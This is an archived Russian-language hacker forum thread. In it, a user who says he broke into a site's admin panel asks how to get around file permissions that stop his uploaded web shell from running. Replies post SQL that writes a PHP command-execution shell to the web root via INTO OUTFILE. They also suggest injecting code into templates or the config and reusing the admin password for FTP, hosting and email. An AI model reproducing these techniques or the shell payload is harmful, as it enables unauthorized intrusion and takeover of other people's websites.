как обойти chmod [Архив] - Форум АНТИЧАТ

Просмотр полной версии : как обойти chmod

fominsa

25.11.2008, 08:48

народ помогите с таким вопросом! есть сайт его я взламал попал в админку в админке есть возможность добавлять файлы но! зараза выставляет chmod 0666 и когда я обращаюсь напрямую к файлу меня перекидывает на сайт хостера (агава) и пишет что права должны быть 0755 что делать вот вроде победа близка:( залить шелл пытался но из за этих прав все к чертям. в папку данную можно залить что угодно хоть .htaccess ( им я чтонибудь могу сделать?)

кстати тамже можно выполнить любой sql код там есть хрень для ввода sql команд

heks

25.11.2008, 09:23

ни че тут не сделаешь пробуй в шаблоны код вставить или еще куда либо

Tigger

25.11.2008, 09:27

А может дело в хостере, а?

_Pantera_

25.11.2008, 10:14

CREATE TABLE `news` (`mess` TEXT NOT NULL) ENGINE = MYISAM ;
INSERT INTO `news` (`mess`) VALUES ('<?php system($_GET[cmd]); ?>');
SELECT `mess` FROM `news` INTO OUTFILE "/var/www/html/shell.php";

chekist

25.11.2008, 11:41

CREATE TABLE `news` (`mess` TEXT NOT NULL) ENGINE = MYISAM ;
INSERT INTO `news` (`mess`) VALUES ('<?php system($_GET[cmd]); ?>');
SELECT `mess` FROM `news` INTO OUTFILE "/var/www/html/shell.php";

после такова запроса у shell.php права будут -rw-rw-rw-
мало вероятно что он запустится, и агава вроде не даёт привилегия File для mysql.

ТС ищи скрипты которые можно редактировать, для начала попробуй конфиг

Neoveneficus

25.11.2008, 16:36

php скрипту не нужны права на запуск. это же не программа... или я не прав?

[Raz0r]

25.11.2008, 17:01

php скрипту не нужны права на запуск.
все верно

geforse

25.11.2008, 21:55

ТС попробуй, можт пароль от админки к ftp/хостингу/мылу подходит = )

chekist

27.11.2008, 13:07

']все верно

лазил на одном серваке, вот там полный пэ, так и не понял почему но скрипт с 0777 не запускался а вот с 0755 запускался как миленький

otmorozok428

27.11.2008, 17:55

лазил на одном серваке, вот там полный пэ, так и не понял почему но скрипт с 0777 не запускался а вот с 0755 запускался как миленький
Ну да, сейчас, так частенько делают: залить скрипт к соседнему юзеру в папку с правами 777 можешь, а выполнить нет. Я писал про такую хрень недавно

http://forum.antichat.ru/thread90408.html

Tyc00n

27.11.2008, 19:04

У меня тоже на агаве такое было,сам еле допер что проблема с правами была)
Но я смотрю,что у тебя возможностей целый вагон, думаю если очень нужен сайт, то справишься) или кидай в раздел "Админки" , там тебе быстро шелл зальют :D